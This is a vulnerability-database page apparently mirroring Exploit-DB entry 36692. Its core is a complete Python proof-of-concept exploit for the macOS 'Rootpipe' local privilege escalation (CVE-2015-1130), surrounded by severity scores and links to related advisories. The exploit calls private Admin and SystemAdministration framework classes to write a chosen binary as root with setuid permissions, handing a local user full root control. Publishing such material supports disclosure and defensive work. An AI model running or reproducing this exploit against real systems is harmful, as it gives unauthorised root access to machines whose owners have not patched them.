Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbEmil KvarnhammarEDB-ID:36692
HistoryApr 09, 2015 - 12:00 a.m.

Apple Mac OSX < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Local Privilege Escalation

2015-04-0900:00:00
Emil Kvarnhammar
www.exploit-db.com
44

7.8 High

AI Score

Confidence

High

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.0005 Low

EPSS

Percentile

15.8%

JSON
########################################################
#
#  PoC exploit code for rootpipe (CVE-2015-1130)
#
#  Created by Emil Kvarnhammar, TrueSec
#
#  Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
#
########################################################
import os
import sys
import platform
import re
import ctypes
import objc
import sys
from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
from Foundation import NSAutoreleasePool

def load_lib(append_path):
    return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path);

def use_old_api():
    return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])


args = sys.argv

if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)

source_binary = args[1]
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

pool = NSAutoreleasePool.alloc().init()

attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()
    tool = st.tool()
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
else:
    adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
    WriteConfigClient = objc.lookUpClass("WriteConfigClient")
    client = WriteConfigClient.sharedClient()
    client.authenticateUsingAuthorizationSync_(None)
    tool = client.remoteProxy()

    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)


print "Done!"

del pool

Related

zdt 2
attackerkb 1
packetstorm 2
prion 1
saint 4
canvas 1
cve 1
thn 1
cisa_kev 1
seebug 1
metasploit 1
exploitpack 1
exploitdb 1
cisa 1
openvas 1
securityvulns 2
nessus 1
zdt
zdt
Mac OS X Rootpipe Privilege Escalation Exploit
2015-04-12 00:00:00
Mac OS X rootpipe Local Privilege Escalation Exploit
2015-04-09 00:00:00
attackerkb
attackerkb
CVE-2015-1130
2015-04-10 00:00:00
packetstorm
packetstorm
Mac OS X rootpipe Local Privilege Escalation
2015-04-09 00:00:00
Mac OS X Rootpipe Privilege Escalation
2015-04-10 00:00:00
prion
prion
Authentication flaw
2015-04-10 14:59:00
saint
saint
OS X rootpipe privilege elevation
2015-04-14 00:00:00
OS X rootpipe privilege elevation
2015-04-14 00:00:00
OS X rootpipe privilege elevation
2015-04-14 00:00:00
canvas
canvas
Immunity Canvas: ROOTPIPE
2015-04-10 14:59:00
cve
cve
CVE-2015-1130
2015-04-10 14:59:00
thn
thn
Apple Failed to Patch Rootpipe Mac OS X Yosemite Vulnerability
2015-04-20 23:31:00
cisa_kev
cisa_kev
Apple OS X Authentication Bypass Vulnerability
2022-02-10 00:00:00
seebug
seebug
Mac OS X < 10.7.5, 10.8.2, 10.9.5 10.10.2 - rootpipe 本地提权漏洞
2015-09-10 00:00:00
metasploit
metasploit
Apple OS X Rootpipe Privilege Escalation
2015-04-10 16:22:00
exploitpack
exploitpack
Apple Mac OSX 10.7.510.8.210.9.510.10.2 - Rootpipe Local Privilege Escalation
2015-04-09 00:00:00
exploitdb
exploitdb
Apple Mac OSX - &#039;Rootpipe&#039; Local Privilege Escalation (Metasploit)
2015-04-13 00:00:00
cisa
cisa
CISA Adds 15 Known Exploited Vulnerabilities to Catalog
2022-02-10 00:00:00
openvas
openvas
Apple Mac OS X Multiple Vulnerabilities-01 (Apr 2015)
2015-04-24 00:00:00
securityvulns
securityvulns
APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004
2015-04-09 00:00:00
Apple Mac OS X multiple security vulnerabilities
2015-04-13 00:00:00
nessus
nessus
Mac OS X 10.10.x < 10.10.3 Multiple Vulnerabilities (FREAK)
2015-04-10 00:00:00

7.8 High

AI Score

Confidence

High

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.0005 Low

EPSS

Percentile

15.8%

JSON
Related for EDB-ID:36692
zdt2attackerkb1packetstorm2prion1saint4canvas1cve1thn1cisa_kev1seebug1metasploit1exploitpack1exploitdb1cisa1openvas1securityvulns2nessus1